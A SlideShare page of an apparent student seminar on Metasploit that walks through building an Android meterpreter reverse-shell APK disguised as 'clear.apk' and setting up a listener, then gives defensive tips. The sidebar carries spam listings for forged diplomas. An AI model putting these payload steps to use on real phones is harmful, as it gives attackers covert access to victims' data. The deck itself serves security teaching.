SlideShare a Scribd company logo
METASPLOIT
GUIDE IN CHARGE
Mr.JINSONDEVIS
PRESENTED BY
HENEL PJ
MCA LE S3
ROLLNO 23
CONTENTS
 Introduction
Kali Linux
Penetration testing
 Metasploit
Introduction to Metasploit
Advantages & Disadvantages
 Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and AttackerSetup
Commands to exploits victim’sAndroid
 Future Scope
 Conclusion
 References
INTRODUCTION ON KALI LINUX
Debian-based Linuxdistribution aimed at advanced
PenetrationTestingand SecurityAuditing.
ReleaseDate: March 13th, 2013.
Security-focused versionof Linuxthat offers a large
numberof tools to seekout weaknessesand secure
your network.
Kali containsseveraltools
Information security tasks
PenetrationTesting,Securityresearch
Computer Forensicsand ReverseEngineering
Developers: Mati Aharoni, DevonKearnsand
Raphael Hertzog of offensive security.
Open source
600 penetration testing tools + Applications
Platforms - x86, x86-64, armel
LatestRelease– Kali 2017.3 – 21st November, 2017
Easyupgrade to future versions
Also called pentesting
Testing a computer system/network /Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Meet regulatoryrequirements
Preserve corporate image and customer loyalty
Penetration Testing
MAIN TERMS
EXPLOIT- a piece of code written to take advantage of a
particular vulnerability inthe system.
PAYLOAD- simplescriptsthat the hackersutilize to interact with a
hacked system.
LHOST- TheIPaddress youwant your listener to bind to.
LPORT- Theport youwantyour listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT
penetration testing platform that enables to find,
exploit, andvalidate vulnerabilities.
Author:Rapid7
License: BSD-3-clause
Twoversions:commercial and free(Community)
edition.
hardware requirements to install Metasploit
 1 GB RAM available
 1 GB+ available diskspace
 2 GHz+ processor
METASPLOITINTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole –part of metasploitframework,
provide interface with all options.
Msfcli –runs directly from the commandline&
puts priority on scripting.
Armitage –GUI for metasploit framework.
Advantages
 Open source
 Frequently updated
 Huge community
 Easy to deployuser specific exploit
Disadvantages
 Difficult to learn
 Can crash your system if not used wisely
 Requires deep knowledge for exploit development
HACKINGWIINDOWSWITH
METASPLOIT
STEP1:OPEN THE METASPLOIT CONSOLE IN KALI
Path:Applications → Exploitation Tools → Metasploit
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom –p android/meterpreter/reverse_tcp
LHOST=192.168.43.207 LPORT=6060 R > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
metasploit payload system to exploit. msf > use
exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
STEP 8: RUN THE COMMAND “ exploit ”
msf exploit(multi/handler) > exploit
FUTURE SCOPE
Beingopen sourceframework, it hasgot huge
community support.
Inorder to face newsecurity challengesMetasploit
isfrequently updated for zero-day vulnerabilities.
More and moreexploits will be made available to
its database for users.
Upcomingversionswill be moreefficient, user-
friendly, GUI-based, web-based with customizing
options along with its interactive console.
CONCLUSION
The backdoor application when installed and turned on the
mobile allows attacker to read, write and modify data. Cautions are.
Never permanently enable installing of Apps from “Unknown
sources “.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Installing antivirus software on your Android device.
REFERENCE
www.metasploit.com
www.rapid7.com
https://tools.kali.org/exploitation-tools/metasploit-
framework
www.securitytube.net
www.google.com
www.youtube.com
THANK YOU…………

More Related Content

What's hot

Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana
 
Security testing
Security testingSecurity testing
Security testing
Khizra Sammad
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
Er. Shiva K. Shrestha
 
Malware forensics
Malware forensicsMalware forensics
Malware forensics
Sameera Amjad
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux ppt
AbhayNaik8
 
Password Cracking
Password CrackingPassword Cracking
Password Cracking
Sagar Verma
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
OWASP Delhi
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
Ankita Ganguly
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
Rashad Aliyev
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
Shahee Mirza
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
n|u - The Open Security Community
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101
Rashid feroz
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
Bhushan Gurav
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 

What's hot (20)

Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 
Security testing
Security testingSecurity testing
Security testing
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
Malware forensics
Malware forensicsMalware forensics
Malware forensics
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux ppt
 
Password Cracking
Password CrackingPassword Cracking
Password Cracking
 
Metaploit
MetaploitMetaploit
Metaploit
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 

Similar to Metasploit

Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
henelpj
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
Nutan Kumar Panda
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
Ali Hussain
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
Nutan Kumar Panda
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Unveiling-Patchwork
Unveiling-PatchworkUnveiling-Patchwork
Unveiling-Patchwork
Brandon Levene
 
The FatRat
The FatRatThe FatRat
The FatRat
AjilSunny
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti
 

Similar to Metasploit (20)

Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
Metapwn
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Unveiling-Patchwork
Unveiling-PatchworkUnveiling-Patchwork
Unveiling-Patchwork
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 

Recently uploaded

制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
cuobya
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
bseovas
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
Laura Szabó
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
hackersuli
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
Toptal Tech
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
wolfsoftcompanyco
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
Trending Blogers
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 

Recently uploaded (20)

制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
 
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
不能毕业如何获得(USYD毕业证)悉尼大学毕业证成绩单一比一原版制作
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 

Metasploit

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Security-focused versionof Linuxthat offers a large numberof tools to seekout weaknessesand secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Developers: Mati Aharoni, DevonKearnsand Raphael Hertzog of offensive security. Open source 600 penetration testing tools + Applications Platforms - x86, x86-64, armel LatestRelease– Kali 2017.3 – 21st November, 2017 Easyupgrade to future versions
  • 5. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatoryrequirements Preserve corporate image and customer loyalty Penetration Testing
  • 6. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 7. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7 License: BSD-3-clause Twoversions:commercial and free(Community) edition. hardware requirements to install Metasploit  1 GB RAM available  1 GB+ available diskspace  2 GHz+ processor
  • 8. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options. Msfcli –runs directly from the commandline& puts priority on scripting. Armitage –GUI for metasploit framework.
  • 9. Advantages  Open source  Frequently updated  Huge community  Easy to deployuser specific exploit Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 10. HACKINGWIINDOWSWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 15.
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. FUTURE SCOPE Beingopen sourceframework, it hasgot huge community support. Inorder to face newsecurity challengesMetasploit isfrequently updated for zero-day vulnerabilities. More and moreexploits will be made available to its database for users. Upcomingversionswill be moreefficient, user- friendly, GUI-based, web-based with customizing options along with its interactive console.
  • 18. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.